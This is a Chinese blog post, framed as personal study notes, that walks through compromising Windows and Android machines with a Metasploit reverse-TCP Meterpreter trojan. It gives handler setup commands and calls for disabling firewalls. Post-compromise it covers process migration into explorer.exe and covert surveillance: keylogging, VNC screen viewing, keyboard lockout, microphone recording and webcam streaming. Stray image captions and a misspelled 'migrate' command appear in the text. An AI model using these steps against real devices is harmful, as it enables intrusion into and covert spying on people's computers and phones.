kali metasploit 木马入侵windows和Android

windows :根据自己的kali IP 生成木马

木马生成

注意shell >  shell.exe之间是有空格的,LHOST是kali 本机的IP ,LPORT是自定义设置的端口,据说高端口比较好过防火墙,(但是我实验的时候感觉差不多,基于win10 的实验,防火墙需要全关了,不然木马文件根本过不去)

生成木马后的文件在本机的主目录下。

file

生成木马后,要把木马拖到要攻击的目标主机下 

打开metasploit,进行攻击

 打开metasploit :msfconsole

调用模块:use exploit/multi/handler

调用payload :set payload windows/meterpreter/reverse_tcp

显示选项;show options

diaouyong

show

参数设置:set LHOST (KALI本机的的IP)

                set LPORT (端口设置与前面的木马端口要一致)

确认设置是否设置成功:show options

shezhi

运行:exploit(进行等待,只要目标主机打开了木马文件,便能扫描到,测试的要人工去打开了,在android上的则要进行安装)

yunxing

结果:

陈宫g

这里显示有一台机器正在运行本机的木马,说明已经拿到了控制权,可以使用help查看命令。

进程注入

 因为木马可能随时会被关掉,所以拿到控制权后,要第一时间进行进程注入。

查看进程列表:ps

 fds a

找到相应的进程:explorer.exe  .并记下pid   (Windows程序管理器或者文件资源管理器,它用于管理Windows图形壳,包括桌面和文件管理,删除该程序会导致Windows图形界面无法使用)

sdaf

进行注入:magtate  4560  

sdf

注入成功。

 

远程桌面查看:run  vnc

键盘监控:keyscan_start

                 keyscan_dump

                keyscan_stop

键盘鼠标锁定:uictl disable keyboard

                       uictl enable keyboard(mouse/all)

录音:record -d  10  (10是十秒的意思,生成的音频是wav格式的,找一个播放器就可以播放)

打开机器的网络摄像头:webcam_stream

shexiangtou

ctrl + C 退出当前操作

exit 退出程序

 

Android 入侵:

步骤跟入侵windows是一样的,就只是有一些命令要改成android,如木马生成的命令中的windows 要改成android,shell > shell.exe要改成 apk > apk.apk  .调用payload中的windows也是改成android。

 

 

android

个人感觉android入侵要比windows要简单。

个人学习笔记。

 

评论 21
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值